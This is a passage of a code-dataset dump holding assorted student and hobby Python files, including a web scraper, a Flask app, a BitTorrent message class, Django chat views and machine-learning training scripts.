(KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36'\n }\n response = requests.get(url,headers=headers)\n return response.text\ndef write_page(html,filename):\n with open(filename,mode = 'w+',encoding=\"utf-8\") as file:\n file.write(html)\nif __name__ == '__main__':\n kw = input(\"请输入你要搜索的贴吧名\")\n begin_page = int(input('请输入起始页'))\n end_page = int(input('请输入结束页'))\n url = 'http://tieba.baidu.com/f?'\n # key = {'kw': kw}\n url = url + kw\n tieba(url,begin_page,end_page)","repo_name":"hmdhub/test","sub_path":"第二周/day 3/下午篇百度贴吧的案例.py","file_name":"下午篇百度贴吧的案例.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"33279255166","text":"import pygame, time\n\nclass Dialog():\n def __init__(self, x, y , w, h, dialog):\n self.rect = pygame.Rect(x, y, w, h)\n self.dialog = dialog\n self.font = pygame.font.SysFont('Times New Roman', 20)\n self.counter = 250\n self.show = False\n \n def draw(self, var):\n pygame.draw.rect(var.screen, (150, 10, 130), self.rect)\n text = self.font.render(self.dialog, True, (255,255,255))\n var.screen.blit(text, self.rect[:2])\n self.counter -= 1\n\n\n ","repo_name":"the-lightstack/pyWeek30","sub_path":"code/dialog.py","file_name":"dialog.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"13849909798","text":"from flask import Flask, render_template, request, url_for, redirect\nfrom salary import salary_and_qol\nfrom topunis import top_unis\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=[\"POST\", \"GET\"])\ndef main():\n if request.method == \"POST\":\n province_ = request.form[\"provinces\"]\n job_ = request.form[\"jobs\"]\n\n return redirect(url_for(\"output\", province = province_, job = job_))\n else:\n return render_template(\"index.html\")\n\n@app.route(\"/?\")\ndef output(province, job):\n #return f\"
    {job} and {province}
    \"\n topNum = 10\n [sal, qol] = salary_and_qol(province, job)\n [uni_names_, dom_tuition_, inter_tuition_] = top_unis(province, topNum)\n print(uni_names_)\n return render_template('results.html',\n province = province,\n job = job,\n sal = sal,\n qol = qol,\n uni_names = uni_names_,\n dom_tuition = dom_tuition_,\n inter_tuition = inter_tuition_,\n top_num = topNum\n )\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"benaka-achar/hackED-Binaries-UniResearch","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74637691014","text":"import math\nfrom bitarray import bitarray\n\n\nclass Message:\n \"\"\"\n This class represents a basic implementation of the Peer Wire Protocol (PWP) used by BitTorrent protocol\n to provide reliable communication methods between peers in the same P2P network\n USAGE:\n message = Message()\n message.init_bitfield()\n \"\"\"\n\n # constants\n X_BITFIELD_LENGTH = b'0000'\n X_PIECE_LENGTH = b'0000'\n\n def __init__(self):\n # A keep-alive message must be sent to maintain the connection alive if no command\n # have been sent for a given amount of time. This amount of time is generally two minutes.\n self.keep_alive = {'len': b'0000'}\n\n # The uploader cannot upload more data to the swarm. Causes could be congestion control..\n self.choke = {'len': b'0001', 'id': 0}\n\n # The uploader is ready to upload more data to the swarm.\n self.unchoke = {'len': b'0001', 'id': 1}\n\n # The downloader is interested in downloading data from the requested peer.\n self.interested = {'len': b'0001', 'id': 2}\n\n # The downloader is not interested in downloading data from the requested peer.\n self.not_interested = {'len': b'0001', 'id': 3}\n\n # The payload is a piece that has been successfully downloaded and verified via the hash.\n self.have = {'len': b'0005', 'id': 4, 'piece_index': None}\n\n # The payload is a bitfield representing the pieces that have been successfully downloaded.\n # The high bit in the first byte corresponds to piece index 0.\n # Bits that are cleared indicated a missing piece, and set bits indicate a valid and available piece.\n # Spare bits at the end are set to zero.\n # [[0,0,0,0,0,0,0,0],[1,1,1,1,1,1,1,1],[1,1,1,1,1,1,1,1]]\n self._bitfield = {'len': b'0013' + self.X_BITFIELD_LENGTH, 'id': 5, 'bitfield': []}\n # The request message is fixed length, and is used to request a block.\n # The payload contains the following information:\n # index: integer specifying the zero-based piece index\n # begin: integer specifying the zero-based byte offset within the piece\n # length: integer specifying the requested length.\n self.request = {'len': b'0013', 'id': 6, 'index': None, 'begin': None, 'length': None}\n\n # The piece message is variable length, where X is the length of the block.\n # The payload contains the following information:\n # index: integer specifying the zero-based piece index\n # begin: integer specifying the zero-based byte offset within the piece\n # block: block of data, which is a subset of the piece specified by index.\n self.piece = {'len': b'0009' + self.X_PIECE_LENGTH, 'id': 7, 'index': None, 'begin': None, 'block': None}\n\n # The payload is identical to that of the \"request\" message. 
It is typically used during \"End Game\"\n # The \"End Game\"\n self.cancel = {'len': b'0013', 'id': 8, 'index': None, 'begin': None, 'length': None}\n\n # The port message is sent by newer versions of the Mainline that implements a DHT tracker.\n # The listen port is the port this peer's DHT node is listening on.\n # This peer should be inserted in the local routing table (if DHT tracker is supported).\n self.port = {'index': b'0003', 'id': 9, 'listen-port': None}\n\n # Tracker requests have the following keys:\n # info_hash\n # The 20 byte sha1 hash of the bencoded form of the info value from the metainfo file.\n # This value will almost certainly have to be escaped.\n # Note that this is a substring of the metainfo file. The info-hash must be the hash of the encoded\n # form as found in the .torrent file, which is identical to bdecoding the metainfo file, extracting\n # the info dictionary and encoding it if and only if the bdecoder fully validated the input\n # (e.g. key ordering, absence of leading zeros). Conversely that\n # means clients must either reject invalid metainfo files or extract the substring directly.\n # They must not perform a decode-encode roundtrip on invalid data.\n # peer_id\n # A string of length 20 which this downloader uses as its id. Each downloader generates its own id at\n # random at the start of a new download. This value will also almost certainly have to be escaped.\n # ip\n # An optional parameter giving the IP (or dns name) which this peer is at. Generally used for the\n # origin if it's on the same machine as the tracker.\n # port\n # The port number this peer is listening on. Common behavior is for a downloader to try to listen\n # on port 6881 and if that port is taken try 6882, then 6883, etc. and give up after 6889.\n # uploaded\n # The total amount uploaded so far, encoded in base ten ascii.\n # downloaded\n # The total amount downloaded so far, encoded in base ten ascii.\n # left\n # The number of bytes this peer still has to download, encoded in base ten ascii. Note that this\n # can't be computed from downloaded and the file length since it might be a resume, and there's a\n # chance that some of the downloaded data failed an integrity check and had to be re-downloaded.\n # event\n # This is an optional key which maps to started, completed, or stopped (or empty, which is the\n # same as not being present). If not present, this is one of the announcements done at regular\n # intervals. An announcement using started is sent when a download first begins, and one using\n # completed is sent when the download is complete. No completed is sent if the file was complete\n # when started. 
Downloaders send an announcement using stopped when they cease downloading.\n self.tracker = {'id': 10, 'torrent_info_hash': -1, 'peer_id': -1, \"ip\": -1, 'port': -1, 'uploaded': -1,\n 'downloaded': -1, 'left': -1, 'event': -1}\n\n ############################# Bitfield Methods ####################################################\n\n def init_bitfield(self, num_pieces):\n \"\"\"\n Initializes the bitfield with predefined values\n :param num_pieces: the number of pieces defined in the .torrent file\n :return: Void\n \"\"\"\n size_bitfield = math.ceil(num_pieces / 8)\n spare_bits = (8 * size_bitfield) - num_pieces\n for i in range(size_bitfield - 1):\n piece_bitfield = bitarray(8)\n piece_bitfield.setall(0)\n self._bitfield['bitfield'].append(piece_bitfield)\n spare_piece_bitfield = bitarray(spare_bits)\n spare_piece_bitfield.setall(0)\n self._bitfield['bitfield'].append(spare_piece_bitfield)\n\n def get_bitfield(self):\n \"\"\"\n :return: the bitfield\n \"\"\"\n return self._bitfield\n\n def get_bitfield_piece(self, piece_index):\n \"\"\"\n :param piece_index:\n :return: the piece bitfield located at index 'piece_index'\n \"\"\"\n return self._bitfield['bitfield'][piece_index]\n\n def get_bitfield_block(self, piece_index, block_index):\n \"\"\"\n :param piece_index:\n :param block_index:\n :return:\n \"\"\"\n return self._bitfield['bitfield'][piece_index][block_index]\n\n def is_block_missing(self, piece_index, block_index):\n \"\"\"\n :param piece_index:\n :param block_index:\n :return: True if the block is missing. Otherwise, returns False\n \"\"\"\n if self._bitfield['bitfield'][piece_index][block_index]:\n return False\n return True\n\n def is_piece_missing(self, piece_index):\n \"\"\"\n :param piece_index:\n :return: True if the piece is missing. 
Otherwise, returns False\n \"\"\"\n piece = self._bitfield['bitfield'][piece_index]\n for block_index in range(len(piece)):\n if self.is_block_missing(piece_index, block_index):\n return True\n return False\n\n def next_missing_block(self, piece_index):\n \"\"\"\n :param piece_index:\n :return: the next missing block index\n \"\"\"\n piece = self._bitfield['bitfield'][piece_index]\n for block_index in range(len(piece)):\n if self.is_block_missing(piece_index, block_index):\n return block_index\n return -1\n\n def next_missing_piece(self):\n \"\"\"\n :return: the next missing piece index\n \"\"\"\n for piece_index in range(len(self._bitfield['bitfield'])):\n if self.is_piece_missing(piece_index):\n return piece_index\n return -1\n\n def set_block_to_completed(self, piece_index, block_index):\n \"\"\"\n :param piece_index:\n :param block_index:\n :return:\n \"\"\"\n self._bitfield['bitfield'][piece_index][block_index] = True\n\n # getters and setters with payload\n\n def get_have(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n piece_index = payload['piece_index']\n self.have['piece_index'] = piece_index\n return self.have\n\n def get_request(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.request['index'] = payload['index']\n self.request['begin'] = payload['begin']\n self.request['length'] = payload['begin']\n return self.request\n\n def get_piece(self, payload, len_hex=b'0009'):\n \"\"\"\n\n :param len_hex:\n :param payload:\n :return:\n \"\"\"\n self.piece['index'] = payload['index']\n self.piece['begin'] = payload['begin']\n self.piece['block'] = payload['block']\n if len_hex > b'0009':\n self.piece['len'] = len_hex\n return self.piece\n\n def get_cancel(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.cancel['index'] = payload['index']\n self.cancel['begin'] = payload['begin']\n self.cancel['length'] = payload['length']\n return self.cancel\n\n def get_port(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.port['listen_port'] = payload['listen_port']\n return self.port\n\n def get_tracker(self, payload):\n \"\"\"\n\n :param payload:\n :return:\n \"\"\"\n self.tracker['torrent_info_hash'] = payload['torrent_info_hash']\n self.tracker['peer_id'] = payload['peer_id']\n self.tracker['ip'] = payload['ip']\n self.tracker['port'] = payload['port']\n self.tracker['uploaded'] = payload['uploaded']\n self.tracker['downloaded'] = payload['downloaded']\n self.tracker['left'] = payload['left']\n self.tracker['event'] = payload['event']\n return self.tracker\n","repo_name":"brian-tle/csc645-networks","sub_path":"labs/lab7/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":11183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"85287580","text":"def printTime(listOList):\r\n i = 0\r\n j = 0\r\n while(j<5):\r\n while(i= 12):\r\n if(timeList[0]>12):\r\n timeList[0]-=12\r\n timeList[0] = str(timeList[0])\r\n for i in timeList:\r\n for j in str(i):\r\n combinedList.append(numDict[j])\r\n combinedList.append(colonSplit)\r\n combinedList.pop(-1)\r\n combinedList.append(pmSplit)\r\n else:\r\n if(timeList[0] == 0):\r\n timeList[0] = 12\r\n timeList[0] = str(timeList[0])\r\n for i in timeList:\r\n for j in str(i):\r\n combinedList.append(numDict[j])\r\n combinedList.append(colonSplit)\r\n combinedList.pop(-1)\r\n combinedList.append(amSplit)\r\n else:\r\n for i in timeList:\r\n for j in str(i):\r\n combinedList.append(numDict[j])\r\n 
combinedList.append(colonSplit)\r\n combinedList.pop(-1)\r\n return combinedList\r\n \r\ndef changeCharacter(char):\r\n cListIterator = 0#thru each number\r\n numIterator = 0#thru each row/str in number\r\n strIterator = 0#thru each letter\r\n while cListIterator < len(cList):\r\n while numIterator < len(cList[cListIterator]):\r\n combiner = \"\"\r\n while strIterator < len(cList[cListIterator][numIterator]):\r\n if (not cList[cListIterator][numIterator][strIterator] == \" \"):\r\n combiner += char\r\n else:\r\n combiner+= cList[cListIterator][numIterator][strIterator]\r\n strIterator+=1\r\n strIterator = 0\r\n cList[cListIterator][numIterator] = combiner\r\n numIterator+=1\r\n numIterator = 0\r\n cListIterator+=1\r\n dictIterator = 0\r\n while dictIterator < 10:\r\n numDict[str(dictIterator)] = cList[dictIterator]\r\n dictIterator += 1\r\n \r\n \r\n# for num in cList:#each number\r\n # for numRow in num:#each list in number\r\n# for string in numRow:#each string in each list\r\n # combiner = \"\"\r\n # for letter in string:#each character in each string\r\n # if( not letter == \" \"):\r\n # combiner+=char\r\n # else:\r\n # combiner+=letter\r\n # numRow[numRow.find(string)] = combiner\r\n\r\ninputTime = input(\"Enter the time: \")\r\nclockType = input(\"Choose the clock type (12 or 24): \")\r\nwhile((not clockType == \"24\") and (not clockType == \"12\") ):\r\n clockType = input(\"That is not a permissable clock type... try again (12 or 24)\")\r\nfillCharacter = input(\"Enter your preferred character: \\n\")#\\n\r\nwhile ((not fillCharacter in \"abcdeghkmnopqrsuvwxyz@$&*=\") and (not fillCharacter == \"\") ):\r\n fillCharacter = input(\"Character not permitted! Try again: \\n\") #\\n\r\nif (not fillCharacter == \"\"): \r\n changeCharacter(fillCharacter)\r\nif (clockType == \"24\"):\r\n clockTypeBoolean = True\r\nelse:\r\n clockTypeBoolean = False\r\nprintTime(interpretTime(inputTime, clockTypeBoolean))\r\n \r\n \r\n ","repo_name":"VidixVici/ENGR102","sub_path":"ascii_clock.py","file_name":"ascii_clock.py","file_ext":"py","file_size_in_byte":4661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5750061562","text":"def bkt(k): # k=indicele componentei curente(xk)\n\t# uneori va fi nevoie de global n, x\n\tglobal n, x, corturi, m\n\tfor v in range(1, n): # (1) trecerea pe verticala v este variabila locala, forul stie mereu unde a\n\t\t# ramas\n\t\tx[k] = v\n\t\tif k <= m and x[k] <= corturi[k]: # (2)\n\t\t\tif k == m and sum(x[1:k+1]) == n and x[1] == corturi[1]: # (3) trecerea orizontala pe DREAPTA\n\t\t\t\tprint(x[1:m+1])\n\t\t\telse:\n\t\t\t\tbkt(k+1)\n\n\nn = int(input())\nm = int(input())\ncorturi = [int(x) for x in input().split()]\ncorturi = [0] + corturi\nx = [0 for _ in range(n+1)]\nbkt(1)\n\"\"\"\n9\n3\n5 2 4\n\"\"\"\n","repo_name":"flawreen/FMI","sub_path":"Python/1/sb4.py","file_name":"sb4.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"9866167929","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import Http404, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nfrom django.urls import reverse, reverse_lazy\nfrom django.views.generic import ListView, CreateView, UpdateView\nfrom 
django.views.generic.edit import FormMixin\nfrom django.shortcuts import get_object_or_404\n# API\nfrom rest_framework import generics, views\nfrom rest_framework.response import Response\n\nfrom users.models import ActiveUser\nfrom .forms import GroupChatForm\nfrom .models import Message, CustomUser, Thread, GroupChat, GroupChatMessage\nfrom .serializers import (GroupSerializer,\n GroupCreateSerializer,\n GroupDetailSerializer,\n MessageSerializer,\n UserSerializer,\n MessageCreateSerializer,\n UserCreateSerializer, )\nfrom rest_framework import status, permissions\n\n\n@login_required\ndef home(request):\n instance = Message()\n last_message = instance.last_message(request.user)\n unseen_message = instance.count_unseen_messages(request.user)\n all_users = sorted(CustomUser.objects.all(), key=lambda inst: inst.date_joined)[::-1]\n groups_participated = GroupChat.objects.filter(users__in=[request.user.pk])\n active_users = ActiveUser.objects.all()\n context = {\n 'title': 'Home',\n 'last_message': last_message,\n 'users': all_users,\n 'groups_participated': groups_participated,\n 'unseen_message': unseen_message,\n 'active_users': active_users,\n }\n return render(request, 'chat/room_all.html', context)\n\n\ndef get_members(group_id=None, group_obj=None, user=None):\n \"\"\" Get all participants that belong to a certain group \"\"\"\n\n if group_id:\n chat_group = GroupChat.objects.get(id=id)\n else:\n chat_group = group_obj\n\n temp_members = []\n for member in chat_group.users.values_list('name', flat=True):\n if member != user:\n temp_members.append(member)\n else:\n temp_members.append('You')\n return ', '.join(temp_members)\n\n\n@login_required\ndef room(request, group_id):\n all_groups = GroupChat.objects.all()\n for group in all_groups:\n if request.user in group.users.all():\n chat_group = GroupChat.objects.get(id=group_id)\n groups = GroupChat.objects.filter(users__in=[request.user.pk])\n group_messages = GroupChatMessage.objects.filter(room_name__in=[group_id])\n active_users = ActiveUser().current_active_users2()\n context = {\n 'chat_group': chat_group,\n 'groups': groups,\n 'group_messages': group_messages,\n 'active_users': active_users,\n 'users': CustomUser.objects.all(),\n 'members': get_members(group_obj=chat_group, user=request.user.name),\n }\n return render(request, 'chat/room_all.html', context)\n # else:\n # return HttpResponseRedirect(reverse(\"chat:unauthorized\"))\n\n\ndef unauthorized(request):\n return render(request, 'chat/unauthorized.html')\n\n\ndef new_group(request):\n if request.method == 'POST':\n form = GroupChatForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, f'You have successfully created a group!')\n return redirect('public-chat')\n else:\n form = GroupChatForm()\n return render(request, 'chat/room_all.html', {'form': form})\n\n\ndef search(request):\n context = {}\n url_parameter = request.GET.get(\"q\")\n if url_parameter:\n contacts = CustomUser.objects.filter(name__icontains=url_parameter)\n groups = GroupChat.objects.filter(users__in=[request.user.pk], room_name__icontains=url_parameter)\n else:\n contacts = CustomUser.objects.all().exclude(pk=request.user.pk)\n groups = GroupChat.objects.filter(users__in=[request.user.pk])\n context = {'contacts': contacts, 'groups': groups}\n if request.is_ajax():\n html = render_to_string(template_name='chat/search-results.html', context=context)\n data_dict = {'html_from_view': html}\n return JsonResponse(data=data_dict, safe=False)\n return render(request, 
\"chat/room_all.html\", context)\n\n\n# async def history(request, room_id):\n# await Tortoise.init(**settings.TORTOISE_INIT)\n# chat_message = await ChatMessage.filter(room_id=room_id).order_by('created_at').values()\n# await Tortoise.close_connections()\n#\n# return await sync_to_async(JsonResponse)(chat_message, safe=False)\n\n\nclass ChatListView(FormMixin, ListView):\n model = Thread\n template_name = 'chat/room_all.html'\n form_class = GroupChatForm\n\n def get_queryset(self):\n Thread.objects.by_user(self.request.user)\n\n def get_object(self):\n user_pub_id = self.kwargs.get('public_id')\n self.other_user = CustomUser.objects.get(public_id=user_pub_id)\n thread_obj = Thread.objects.get_or_create_personal_thread(self.request.user, self.other_user)\n if thread_obj is None:\n raise Http404\n return thread_obj\n\n def get_context_data(self, **kwargs):\n last_message = Message().last_message(self.request.user)\n \"\"\" Remember to set seen sms \"\"\"\n user_pub_id = self.kwargs.get('public_id')\n current_user = CustomUser.objects.get(public_id=user_pub_id)\n groups_participated = GroupChat.objects.filter(users__in=[self.request.user.pk])\n users = CustomUser.objects.all()\n active_user = ActiveUser().current_active_users(user_pub_id)\n for g in groups_participated:\n if self.request.user in g.users.all():\n context = {\n 'me': self.request.user.name,\n 'messages': self.get_object().message_set.all(),\n 'users': users,\n 'thread': self.get_object(),\n 'other_user': self.other_user,\n 'groups_participated': groups_participated,\n 'current_user': current_user,\n 'active_user': active_user\n }\n return context\n else:\n context = {\n 'me': self.request.user.name,\n 'messages': self.get_object().message_set.all(),\n 'users': CustomUser.objects.all(),\n 'thread': self.get_object(),\n 'other_user': self.other_user,\n 'active_user': active_user\n }\n return context\n context = {\n 'me': self.request.user.name,\n 'messages': self.get_object().message_set.all(),\n 'users': CustomUser.objects.all(),\n 'thread': self.get_object(),\n 'other_user': self.other_user,\n 'current_user': current_user,\n 'active_user': active_user\n }\n return context\n\n def post(self, request, **kwargs):\n self.object = self.get_object()\n thread = self.get_object()\n data = request.POST\n user = request.user\n text = data.get('message')\n Message.objects.create(sender=user, thread=thread, text=text)\n context = self.get_context_data(**kwargs)\n return context\n\n\nclass GroupChatCreate(CreateView):\n model = GroupChat\n template_name = 'chat/create_group.html'\n fields = '__all__'\n\n def get_context_data(self, **kwargs):\n context = super(GroupChatCreate, self).get_context_data(**kwargs)\n context['form'] = GroupChatForm(request=self.request)\n return context\n\n def form_valid(self, form):\n user = CustomUser.objects.get(pk=self.request.user.id)\n group_name = form.cleaned_data.get('room_name')\n instance = GroupChat.objects.create(room_name=group_name)\n try:\n instance.users.add(user)\n except Exception as e:\n raise e\n return redirect(\"/\")\n\n\nclass GroupChatUpdate(LoginRequiredMixin, UpdateView):\n model = GroupChat\n fields = ['room_name', 'users']\n\n def get_success_url(self):\n return reverse_lazy('public-chat', kwargs={'group_id': self.object.pk})\n\n def form_valid(self, form):\n messages.success(self.request, f'Successfully updated the task.')\n return super().form_valid(form)\n\n\n\"\"\" API Implementations \"\"\"\n\n\nclass GroupView(generics.RetrieveAPIView):\n queryset = GroupChat.objects.all()\n\n 
def get(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = GroupSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass GroupCreateView(generics.CreateAPIView):\n serializer_class = GroupCreateSerializer\n\n\nclass MessageCreateView(generics.CreateAPIView):\n serializer_class = MessageCreateSerializer\n\n\nclass GroupDetail(views.APIView):\n \"\"\" Retrieve, update or delete group object \"\"\"\n\n def get_object(self, pk):\n try:\n return GroupChat.objects.get(pk=pk)\n except GroupChat.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n group = self.get_object(pk)\n serializer = GroupDetailSerializer(group, data=request.data)\n if serializer.is_valid():\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, pk, format=None):\n group = self.get_object(pk)\n serializer = GroupDetailSerializer(group, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n group = self.get_object(pk)\n group.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass MessageView(generics.RetrieveAPIView):\n queryset = Message.objects.all()\n\n def get(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = MessageSerializer(queryset, many=True)\n return Response(serializer.data)\n\n\nclass MessageDetail(views.APIView):\n \"\"\" Gukurura, guhindura, no gukoresha messages in our API \"\"\"\n\n def get_object(self, pk):\n try:\n return Message.objects.get(pk=pk)\n except Message.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n message = self.get_object(pk)\n serializer = MessageSerializer(message, data=request.data)\n if serializer.is_valid():\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, pk, format=None):\n message = self.get_object(pk)\n serializer = MessageSerializer(message, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk, format=None):\n message = self.get_object(pk)\n message.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserDetail(views.APIView):\n \"\"\" Gukurura, guhindura, no gukoresha users in our API \"\"\"\n\n def get_object(self, pk):\n try:\n return CustomUser.objects.get(pk=pk)\n except CustomUser.DoesNotExist:\n raise Http404\n\n def get(self, request, pk):\n user = self.get_object(pk)\n serializer = UserSerializer(user, data=request.data)\n if serializer.is_valid():\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_404_NOT_FOUND)\n\n def put(self, request, pk):\n user = self.get_object(pk)\n serializer = UserSerializer(user, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, pk):\n user = self.get_object(pk)\n user.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserCreateView(generics.CreateAPIView):\n queryset = CustomUser.objects.all()\n serializer_class = UserCreateSerializer\n permission_classes = 
(permissions.AllowAny,)\n\n\nclass AllUsers(generics.RetrieveAPIView):\n queryset = CustomUser.objects.all()\n\n def get(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = UserSerializer(queryset, many=True)\n return Response(serializer.data)\n","repo_name":"izamha/hcd-chatApp","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13820758359","text":"import time\nimport os\nimport yaml\nimport torch\nimport argparse\nfrom tqdm import tqdm\nimport numpy as np\nfrom EEGNet import EEGNet_encoder\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nimport pytorch_lightning as pl\n\ndef load_data(data_path):\n \"\"\"\n Load data from data_path\n :param data_path: path to data\n :return: train_data: list of training data\n \"\"\"\n train_data = []\n for file_name in os.listdir(data_path):\n if file_name.endswith('.npy'):\n file_path = os.path.join(data_path, file_name)\n eeg_data = np.load(file_path)\n train_data.append(torch.from_numpy(eeg_data))\n return train_data\n \n\ndef main(args):\n old_time = time.time()\n\n test_id = [18, 21, 30, 64, 71, 82, 123]\n\n if os.path.isfile(args.config):\n with open(args.config, \"r\") as fd:\n config = yaml.load(fd, Loader=yaml.FullLoader)\n else:\n raise ValueError(\"Config file does not exist.\")\n\n # Load data\n num_classes = config['EEG_net']['num_classes']\n root_dir = config['dataset']['dataset_root_dir']\n data_path = config['dataset']['train_data_path']\n label_path = config['dataset']['train_label_path']\n train_data_path = os.path.join(root_dir, data_path)\n train_label_path = os.path.join(root_dir, label_path)\n\n label_id = np.load(train_label_path)\n\n train_data = []\n label = []\n\n for children in tqdm(os.listdir(train_data_path), desc= 'Processing', unit= 'child'):\n folder_path = os.path.join(train_data_path, children)\n if int(children) not in test_id:\n child_data = load_data(folder_path)\n train_data.extend(child_data)\n for i in range(len(child_data)):\n label_np = np.zeros(num_classes)\n label_np[label_id[int(children)]] = 1\n label.append(label_np)\n train_data = torch.stack(train_data)\n train_data = train_data.unsqueeze(1)\n label = np.array(label)\n\n print('train_data shape:', train_data.size())\n\n # early_stop_callback = EarlyStopping(\n # monitor='val_loss',\n # min_delta=0.00,\n # patience=20,\n # verbose=True,\n # mode='min',\n # )\n # ckpt_callback = ModelCheckpoint(mode=\"min\",\n # monitor=\"val_loss\",\n # dirpath='./saved_weights',\n # filename='{epoch}-{val_loss:.2f}',\n # every_n_epochs=1)\n \n model = EEGNet_encoder(train_data, label, train_data, label, alpha= config['EEG_net']['alpha'], norm_rate= config['EEG_net']['norm_rate'], learning_rate= config['EEG_net']['learning_rate'])\n\n trainer = pl.Trainer(max_epochs=config['trainer']['max_epochs'],\n accelerator=config['trainer']['accelerator'],\n devices=[2], strategy='ddp')\n \n # trainer.tune(model)\n # print('Learning rate:', model.learning_rate)\n trainer.fit(model)\n\n # print(f'best loss: {ckpt_callback.best_model_score.item():.5g}')\n\n weights = model.state_dict()\n torch.save(weights, config['save_ckpt_path'])\n\n current_time = time.time()\n print('time: ' + str(current_time - old_time) + 's')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Evaluate our model')\n 
parser.add_argument('--config', type=str, metavar='DIR',\n help='path to a config file')\n args = parser.parse_args()\n main(args)","repo_name":"hoppee21/EEG-ADHD","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"25176254416","text":"import os\nimport tqdm\nimport torch\nimport numpy as np\nimport random\nimport argparse\nimport yaml\nfrom torch.utils.data import DataLoader\n\nfrom piad.latent_model import GaussianNoise\nfrom piad.logger import Logger\nfrom piad.networks import ResNetGenerator, ResNetEncoder, LatentDiscriminator\nfrom piad.datasets import create_dataset, create_transform, inf_dataloader\nfrom piad.optimizer import Optimizer\nfrom piad.adv_losses import WassersteinLoss\nfrom piad.rec_losses import PerceptualLoss\n\n\nclass PIADTrainer:\n def __init__(self, config):\n self.config = config\n\n if config['random_seed'] is not None:\n torch.manual_seed(config['random_seed'])\n torch.cuda.manual_seed(config['random_seed'])\n np.random.seed(config['random_seed'])\n random.seed(config['random_seed'])\n torch.backends.cudnn.deterministic = True\n\n self.verbose = config['verbose']\n output_root = os.path.join(config['output_root'], str(config[\"normal_class\"]), str(config[\"run\"]))\n self.checkpoint_root = os.path.join(output_root, 'checkpoint')\n self.log_root = os.path.join(output_root, 'logs')\n\n self.logger = Logger(self.log_root)\n\n self.image_res = config['image_res']\n self.image_dim = config['image_dim']\n self.latent_res = config['latent_res']\n self.latent_dim = config['latent_dim']\n\n self.iters = config['iters']\n self.log_iter = config['log_iter']\n self.checkpoint_iter = config['checkpoint_iter']\n self.image_sample_iter = config['image_sample_iter']\n self.update_grad_norm_iter = config.get('update_grad_norm_iter', 500)\n\n self.batch_size = config['batch_size']\n self.n_dis = config['n_dis']\n assert self.n_dis >= 1\n\n \"=========================================== create data model ================================================\"\n\n dataset_type = config['dataset_type']\n dataset_root = config['dataset_root']\n transform = create_transform(dataset_type)\n train_dataset = create_dataset(dataset_type, dataset_root, 'train', config[\"normal_class\"], normal=True,\n transform=transform, extra_dataset_params=config.get(\"extra_dataset_params\"))\n self.image_model = inf_dataloader(\n DataLoader(train_dataset, batch_size=self.batch_size, shuffle=True, drop_last=True,\n num_workers=config['num_workers'])\n )\n\n \"=========================================== create latent model ==============================================\"\n\n self.latent_model = GaussianNoise(self.latent_dim, self.latent_res, self.batch_size)\n\n \"============================================= create networks ================================================\"\n\n self.gen = ResNetGenerator(self.image_res, self.image_dim, self.latent_res, self.latent_dim, config['gen']).cuda()\n self.enc = ResNetEncoder(self.image_res, self.image_dim, self.latent_res, self.latent_dim, config['enc']).cuda()\n self.image_dis = ResNetEncoder(self.image_res, self.image_dim, 1, 1, config['image_dis'], 